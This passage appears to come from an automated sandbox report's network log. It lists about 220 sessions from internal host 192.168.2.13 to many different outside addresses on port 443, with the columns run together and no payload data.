                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21704192.168.2.1333400156.248.156.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21705192.168.2.135679041.139.31.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21706192.168.2.135923680.116.79.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21707192.168.2.135307695.27.252.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21708192.168.2.134753617.6.178.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21709192.168.2.1339988174.236.166.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21710192.168.2.1345556197.249.38.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21711192.168.2.1360942221.15.219.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21712192.168.2.1338402124.22.20.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21713192.168.2.1334232155.245.191.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21714192.168.2.1333442168.200.4.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21715192.168.2.134688251.203.136.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21716192.168.2.1336784118.129.145.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21717192.168.2.133527893.244.15.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21718192.168.2.134956234.35.171.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21719192.168.2.133659227.195.141.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21720192.168.2.1352426154.90.136.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21721192.168.2.135365298.85.135.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21722192.168.2.1359802191.250.35.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21723192.168.2.1353446125.9.128.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21724192.168.2.13441748.5.139.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21725192.168.2.1351668132.89.121.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21726192.168.2.133401420.104.246.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21727192.168.2.1357366117.188.67.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21728192.168.2.1350480145.162.169.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21729192.168.2.1356654212.250.197.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21730192.168.2.133824294.177.44.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21731192.168.2.1360700135.242.179.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21732192.168.2.1335364140.202.31.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21733192.168.2.1356004130.223.162.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21734192.168.2.135547694.143.148.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21735192.168.2.136090048.217.154.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21736192.168.2.1339528160.152.234.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21737192.168.2.1360964178.127.251.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21738192.168.2.1351052155.92.193.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21739192.168.2.1349604119.3.12.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21740192.168.2.1335026168.245.14.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21741192.168.2.1338924112.222.17.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21742192.168.2.135038850.11.75.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21743192.168.2.1337020157.80.10.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21744192.168.2.1339312163.170.89.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21745192.168.2.134828893.79.20.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21746192.168.2.1342530194.162.98.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21747192.168.2.1348966197.27.150.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21748192.168.2.133785257.153.65.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21749192.168.2.1351330146.187.4.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21750192.168.2.134176076.37.183.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21751192.168.2.1344540204.221.235.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21752192.168.2.1335636193.12.82.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21753192.168.2.1341810179.179.58.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21754192.168.2.1360870148.233.97.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21755192.168.2.1360968172.166.228.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21756192.168.2.1353760129.4.146.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21757192.168.2.133780045.126.163.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21758192.168.2.1355990147.37.128.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21759192.168.2.1337764139.205.151.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21760192.168.2.133596624.255.67.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21761192.168.2.133538243.248.0.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21762192.168.2.135525223.196.177.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21763192.168.2.1334998205.233.12.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21764192.168.2.1358366134.51.176.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21765192.168.2.1353494181.201.239.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21766192.168.2.1346732112.21.16.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21767192.168.2.135613239.218.163.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21768192.168.2.1335556124.31.156.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21769192.168.2.13564509.194.118.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21770192.168.2.134575841.138.12.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21771192.168.2.1357842134.153.251.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21772192.168.2.134047237.16.148.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21773192.168.2.1342462158.51.150.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21774192.168.2.1358848133.183.3.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21775192.168.2.1335418220.209.148.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21776192.168.2.1359686135.97.194.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21777192.168.2.1345744144.149.247.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21778192.168.2.1348314202.57.87.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21779192.168.2.133982467.155.54.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21780192.168.2.1336150213.223.208.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21781192.168.2.1344540156.211.244.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21782192.168.2.1345690189.163.195.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21783192.168.2.1336928148.166.162.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21784192.168.2.1347414138.179.161.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21785192.168.2.134198470.18.107.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21786192.168.2.1350376124.75.172.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21787192.168.2.133779631.25.191.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21788192.168.2.133639837.92.19.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21789192.168.2.135009889.220.0.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21790192.168.2.1356012165.173.51.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21791192.168.2.1338554129.225.194.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21792192.168.2.134536082.137.241.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21793192.168.2.135024067.195.30.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21794192.168.2.1342820186.247.81.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21795192.168.2.136074496.18.65.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21796192.168.2.1345548217.192.192.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21797192.168.2.133657034.2.40.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21798192.168.2.1346422155.3.75.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21799192.168.2.13525341.30.14.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21800192.168.2.134371423.145.145.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21801192.168.2.1333552156.103.166.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21802192.168.2.1340272190.180.208.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21803192.168.2.1353018122.242.149.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21804192.168.2.1342806213.238.194.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21805192.168.2.135638469.3.120.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21806192.168.2.133938820.1.216.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21807192.168.2.1356046119.103.74.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21808192.168.2.1336040124.227.125.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21809192.168.2.134263043.98.48.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21810192.168.2.134291235.194.166.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21811192.168.2.133783299.254.115.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21812192.168.2.133694481.105.117.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21813192.168.2.134711093.58.115.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21814192.168.2.1342330143.255.121.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21815192.168.2.1341024121.144.20.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21816192.168.2.1344302154.242.191.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21817192.168.2.1339894137.213.13.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21818192.168.2.1350180139.22.35.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21819192.168.2.134630097.179.130.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21820192.168.2.1337284176.16.175.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21821192.168.2.1337752116.57.183.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21822192.168.2.1342046189.187.248.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21823192.168.2.1336882172.47.164.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21824192.168.2.13493762.36.209.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21825192.168.2.1346870201.64.141.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21826192.168.2.1341348187.95.91.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21827192.168.2.1335348128.228.98.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21828192.168.2.1351658222.255.212.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21829192.168.2.135703051.77.14.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21830192.168.2.135628067.28.41.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21831192.168.2.1334774221.35.143.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21832192.168.2.133446878.54.244.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21833192.168.2.1358402136.97.231.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21834192.168.2.133313827.87.236.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21835192.168.2.1355360120.247.176.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21836192.168.2.1333446173.244.144.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21837192.168.2.134459039.160.103.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21838192.168.2.134213253.215.130.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21839192.168.2.135723079.210.148.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21840192.168.2.1336032208.225.4.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21841192.168.2.1342114198.106.61.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21842192.168.2.1341974218.250.45.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21843192.168.2.1350924194.214.107.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21844192.168.2.134973450.88.216.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21845192.168.2.1333270134.97.222.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21846192.168.2.1341474110.35.228.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21847192.168.2.135275649.136.133.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21848192.168.2.1341200202.65.238.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21849192.168.2.133602850.241.182.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21850192.168.2.135263458.133.152.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21851192.168.2.135874240.173.103.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21852192.168.2.1339742143.43.118.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21853192.168.2.1350746105.183.122.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21854192.168.2.1343488120.107.197.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21855192.168.2.1357960114.83.27.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21856192.168.2.134646879.55.127.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21857192.168.2.1358986200.35.75.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21858192.168.2.135456840.111.216.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21859192.168.2.1346772199.236.240.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21860192.168.2.135599088.172.246.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21861192.168.2.134438866.207.233.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21862192.168.2.133663881.72.141.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21863192.168.2.1347934143.170.212.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21864192.168.2.1346966152.157.116.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21865192.168.2.1336292165.241.151.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21866192.168.2.1350198138.192.28.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21867192.168.2.134594870.40.81.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21868192.168.2.1349562142.177.126.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21869192.168.2.135302023.88.223.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21870192.168.2.1342002115.149.210.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21871192.168.2.1346216139.163.94.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21872192.168.2.1354310160.244.58.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21873192.168.2.1343272218.152.44.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21874192.168.2.1345562170.105.200.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21875192.168.2.134726046.193.61.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21876192.168.2.1356496201.37.215.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21877192.168.2.1352200193.24.144.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21878192.168.2.133688293.97.135.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21879192.168.2.134135485.16.230.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21880192.168.2.1340586178.111.109.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21881192.168.2.135153613.72.220.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21882192.168.2.134366435.113.123.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21883192.168.2.1349030175.126.230.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21884192.168.2.1345096209.36.248.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21885192.168.2.1336718182.126.243.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21886192.168.2.1354974221.23.92.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21887192.168.2.13584229.136.144.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21888192.168.2.135791287.244.67.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21889192.168.2.135161290.182.45.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21890192.168.2.1349704149.176.40.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21891192.168.2.133734012.156.89.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21892192.168.2.133933259.232.163.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21893192.168.2.1335482174.77.137.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21894192.168.2.135287242.221.120.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21895192.168.2.1348034134.9.235.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21896192.168.2.1343570169.66.15.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21897192.168.2.133514242.175.125.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21898192.168.2.1340768121.104.78.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21899192.168.2.1353670182.240.205.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21900192.168.2.1353888115.161.144.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21901192.168.2.1346068203.66.206.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21902192.168.2.133484864.42.179.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21903192.168.2.1351544144.42.238.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21904192.168.2.1341320187.36.7.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21905192.168.2.135411066.178.224.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21906192.168.2.1352912135.145.153.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21907192.168.2.134061677.64.160.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21908192.168.2.1348332130.233.93.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21909192.168.2.1351740115.35.10.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21910192.168.2.1333364198.205.222.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21911192.168.2.1349104219.47.250.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21912192.168.2.1359574118.6.80.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21913192.168.2.1342972175.165.33.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21914192.168.2.1340858183.251.16.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21915192.168.2.1334184149.37.27.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21916192.168.2.1355782161.50.44.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21917192.168.2.135489098.255.17.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21918192.168.2.1349682107.242.247.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21919192.168.2.1351402189.194.150.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21920192.168.2.1354404197.16.69.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21921192.168.2.134070490.61.49.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21922192.168.2.133609048.220.250.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21923192.168.2.134544823.79.233.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21924192.168.2.135420065.224.134.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
